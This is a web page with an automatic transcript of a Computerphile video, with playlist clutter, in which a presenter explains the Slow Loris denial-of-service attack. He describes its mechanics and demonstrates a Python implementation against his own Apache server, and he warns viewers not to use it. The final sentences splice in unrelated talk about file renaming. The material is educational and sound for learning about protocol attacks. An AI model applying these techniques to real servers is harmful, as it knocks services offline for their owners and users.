Slow Loris Attack - Computerphile
Key Takeaways
The Slow Loris Attack is a type of Denial of Service attack that targets servers by slowly sending HTTP requests, explained by Dr Mike Pound from Computerphile, using examples and technical details to illustrate the attack's mechanics.
Full Transcript
this is not really relevant to the video actually but this is a slow Lis I just thought I'd show it cuz it was cute that's all don't keep them as pets though now um the slow Lis is I guess my favorite Deni of service attack now that says a lot about me doesn't it that I have a a favorite denyer service attack before I demonstrate anything of course let's get straight out in the open you shouldn't be using slow laes on anyone or any other deny the service attack on anyone else right because you're getting a lot of trouble most Anala Services the idea that you try and defend peat some web server or some computer on the other side of the web by giving it as much bandwidth as you can such that it breaks right they have a certain amount of bandwidth they're allowed to use and if you give them more than that or try and request too many web pages their server goes down that's a general idea of deny service distributed deny service is just the next level where you have multiple computers all attempting to do the same thing and then more modern denal service will use amplification and things like this to try and improve us even more but the whole point is as much B with as you can all at the same time right and if you get enough you can take them down if you don't then they just laugh right so you know Microsoft and Google you're going to have going to have difficulty bringing them down but smaller websites it can have a massive impact on the amount of money they're making if no one can visit their shop or something like that so it's a real problem what I like about the slow Lis is it comes at it from a completely different way it's a protocol attack so a layer seven application attack which doesn't need a lot of bandwidth so I can do a slow lus on someone and then just browse the web as normal play computer games so let's think back to how me talking to a web server works I send off a get request to a website and I say get me index.html then the web server sends back index.html and that's the end of that conversation right then I start up another conversation that says I've read this index.html I now need you know header do jpeg so I send off another get request and so on and we have these short conversations back and forth now usually an H HTP request is just text right so it literally says HTTP get 1.1 or something index.html where I'm sending it a bit about me so I'm using you know Firefox or something um and then some other data and it always ends with two carriage return line feeds so two new lines right so normally in text we have a carriage return character and then a line feed character two of those signals the end of an HTTP request what the inventor to slow Lis uh some hacker named Arsen make I think decided was what if I never send those carriage return line feeds can I just keep the website waiting for me can I go so slowly by asking for websites so slowly that I just break them right and yeah you can um and and so they have things like timeouts and stuff so maybe let's say I'm in the middle of browsing a website and then on my phone right and just as I'm in the middle of sending off a request I lose phone signal right that's pretty common in you know these days so that would time out on the servers end as well and they would let the connection go and then they could serve someone else a website the problem comes if I don't send no data I send some data but just painfully slowly what's great about the slow Lis is there's hardly any code it it talks to a web server and it basically says get me index.html or something like that and then sends a space or a zero or a random number or something like that and then it waits for about you know 10 20 30 seconds just when the website's about to assume it's gone and sends another single bite and says I'm still here I'm just really slow and then it does this again and it does this again and keeps that connection going as long as it can and then it does it with 200 other connections or as many connections as it can so my computer sending out this attack is sending 200 bite packets every minute or so it's not a lot at all and it's very difficult for a firewall or something to notice this because these are valid HTTP requests they're just super slow right and um you know maybe I've just got a really bad internet connection maybe yeah um now this doesn't affect every web server it mostly affects Apache because of the way Apache works unfortunately Apache is very prevalent there's about 40 50% Apache these days it's hard to know for sure but I had a quick check and that seems to be about the rough estimate they go up and down Apache when they designed it they decided it would be a good idea to start up a new thread to to serve every concurrent connection so when a connection comes in with an HTTP request they set up a new thread that handles that request and then the thread goes away when it's finished now that wasn't entirely stupid you know if the if the connections appear and then they go away that's not a problem but if the connections start to stay open longer than we anticipate then our connection limit gets reached so aaty will have a connection limit of let's say 200 concurrent connections because beyond that you've just got so many threads the whole thing starts to grow to a Hal so what Loris does is begin to open connections and as a new one gets freed up from someone else using the website they'll open that one and they'll open this one and they'll open this one until they got all the connections so let's see how it works right so I I've come up with another of my glorious websites just for this Mike's website so that's actually this computer here which is running Windows in Apache now so this is my website with my company profile in laipson what this website is not very important let's have a quick look at the code this is not the original implementation of slow Lis this is the python implementation I found but essentially it's not very long right 67 lines which is another reason I like it because it's so elegant really what it does it has some code here to start up a socket which is a TCP connection um and make a get request here's our get request text and then for all existing sockets down here can we send a little bit more data every 15 seconds and if a socket dies we recreate it and we just keep that going and it will do this for 200 concurrent sockets which is more than my Apache installation is configured to handle so let's run this then there we are python slow loris to the IP address that we just looked at right it's created all the sockets and now it's just going to sit there every now and again sending a bite of data to this Apache web server so the web server thinks that it's got 200 people looking at the website when in fact it's got one person looking at the website really really slowly 200 times if I press Refresh on this cuz it's been cached we can see we're now waiting waiting so if you the cach now on your browser would that then not be able to get the website no I wouldn't be able to see the website so let's go to the website now that we're under slow Lois so right we're waiting for it I mean we might get lucky maybe one of these sockets drops out and then the server can respond right but we might not but you click to go back to that same website yeah and of course it can't load it in so we're just seeing fire yeah at some point we might see a Timeout on this client side saying no I didn't get any response from the server this server has basically won't serve this website to me because it's too busy serving 200 other websites or more specifically busy waiting for us to finish the request 200 times so it can actually finally get on with something and how long would that carry on sending those requests as long as I want uh as long as I want and as soon as a socket dies another one comes up and just keeps going I mean 67 lines of code right and and here's a nice bit fun things to do I can just use the net as normal my net is fine right I'm not using all my bandwidth to do this I'm using barely any of my bandwidth um which is what I really like about it this kind of attack is called a low and slow attack so there's a couple of others Rudy uh are you dead yet is another one that does similar things um and what's clever about them is they're quite hard to detect because what it's doing is totally normal HTTP it's just doing it incredibly slowly and when they people when they Design This and when they designed a patch you no one ever thought you do something like that and that's exactly the problem with these sort of protocol attacks the assumption that they'll always do what you expect them to do and they won't do these random strange side things so yeah my favorite dalala service if you rename a document you don't change a document so if I rename the file not .txt to be still not empty txt but the key thing is that every time you create an atom for the same string I the same sequence of characters you get the same atom back
Original Description
Denial of service usually relies on a flood of data. Slow Loris takes a more elegant approach, and almost bores a server to death. Dr Mike Pound explains.
Cracking Windows by Atom Bombing: https://youtu.be/rRxuh9fp7QI
Zero Size Files: https://youtu.be/kiTTAbeqQKY
Google Deep Dream: https://youtu.be/BsSmBPmPeYQ
Babbage's Analytical Engine: COMING SOON
http://www.facebook.com/computerphile
https://twitter.com/computer_phile
This video was filmed and edited by Sean Riley.
Computer Science at the University of Nottingham: http://bit.ly/nottscomputer
Computerphile is a sister project to Brady Haran's Numberphile. More at http://www.bradyharan.com
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from Computerphile · Computerphile · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
Follow the Cookie Trail - Computerphile
Computerphile
EXTRA BITS - Follow the Cookie Trail - Computerphile
Computerphile
Musical Floppy Drives - Computerphile
Computerphile
The Hair Algorithm - Computerphile
Computerphile
Getting Sorted & Big O Notation - Computerphile
Computerphile
Quick Sort - Computerphile
Computerphile
Hyper History and Cyber War - Computerphile
Computerphile
Entropy in Compression - Computerphile
Computerphile
Original Elite on the BBC B - Computerphile
Computerphile
IP Addresses and the Internet - Computerphile
Computerphile
A Career in Video Games - Computerphile
Computerphile
Error Detection and Flipping the Bits - Computerphile
Computerphile
Programming BASIC and Sorting - Computerphile
Computerphile
Birthplace of the World Wide Web - Computerphile
Computerphile
Punch Card Programming - Computerphile
Computerphile
Programming Paradigms - Computerphile
Computerphile
CERN Computing Centre (and mouse farm) - Computerphile
Computerphile
Error Correction - Computerphile
Computerphile
Home-Made Code - Computerphile
Computerphile
Security of Data on Disk - Computerphile
Computerphile
Gesture Controls - Computerphile
Computerphile
How Intelligent is Artificial Intelligence? - Computerphile
Computerphile
Encryption and Security Agencies - Computerphile
Computerphile
Virtual Machines Power the Cloud - Computerphile
Computerphile
Hacking Websites with SQL Injection - Computerphile
Computerphile
How Huffman Trees Work - Computerphile
Computerphile
Cracking Websites with Cross Site Scripting - Computerphile
Computerphile
Cloud Computing (Cloudy with a Chance of Pizza) - Computerphile
Computerphile
Texting Cabbage with a Recorder - Computerphile
Computerphile
Hashing Algorithms and Security - Computerphile
Computerphile
How YouTube Works - Computerphile
Computerphile
How NOT to Store Passwords! - Computerphile
Computerphile
A New Golden Age of Video Games - Computerphile
Computerphile
A Universe of Triangles - Computerphile
Computerphile
Cross Site Request Forgery - Computerphile
Computerphile
The True Power of the Matrix (Transformations in Graphics) - Computerphile
Computerphile
The Great 202 Jailbreak - Computerphile
Computerphile
EXTRA BITS - Printing and Typesetting History - Computerphile
Computerphile
Triangles to Pixels - Computerphile
Computerphile
The Problem with Time & Timezones - Computerphile
Computerphile
The Visibility Problem - Computerphile
Computerphile
Lights and Shadows in Graphics - Computerphile
Computerphile
The Penguin Barcode - Computerphile
Computerphile
Typesetters in the '80s - Computerphile
Computerphile
The Font Magicians - Computerphile
Computerphile
The Little Mac with the Big Bite - Computerphile
Computerphile
EXTRA BITS - More on the Original Mac at 30 - Computerphile
Computerphile
XP to Ubuntu with an 8yr old Hacktop - Computerphile
Computerphile
EXTRA BITS - Hacktop Real-Time Boot Comparison - Computerphile
Computerphile
EXTRA BITS - Making a Bootable USB in Linux - Computerphile
Computerphile
EXTRA BITS - Installing Ubuntu Permanently - Computerphile
Computerphile
The Dawn of Desktop Publishing - Computerphile
Computerphile
What is Bootstrapping? - Computerphile
Computerphile
Reverse Polish Notation and The Stack - Computerphile
Computerphile
Home-Made Z80 Retro Computer - Computerphile
Computerphile
Should Everybody Learn to Code? - Computerphile
Computerphile
Programming in PostScript - Computerphile
Computerphile
Heartbleed, Running the Code - Computerphile
Computerphile
YouTube's Secret Algorithm - Computerphile
Computerphile
YouTube Search & Discovery - Computerphile
Computerphile
More on: Security Basics
View skill →Related AI Lessons
⚡
⚡
⚡
⚡
The AI Moat Paradox: The Better Models Become, the Less Models Matter
Medium · AI
170,927 AI Papers Reveal the Biggest Research Shifts of the First Half of 2026
Medium · Machine Learning
170,927 AI Papers Reveal the Biggest Research Shifts of the First Half of 2026
Medium · Data Science
[PoV] When Everyone Is Smart, No One Is
Medium · AI
🎓
Tutor Explanation
DeepCamp AI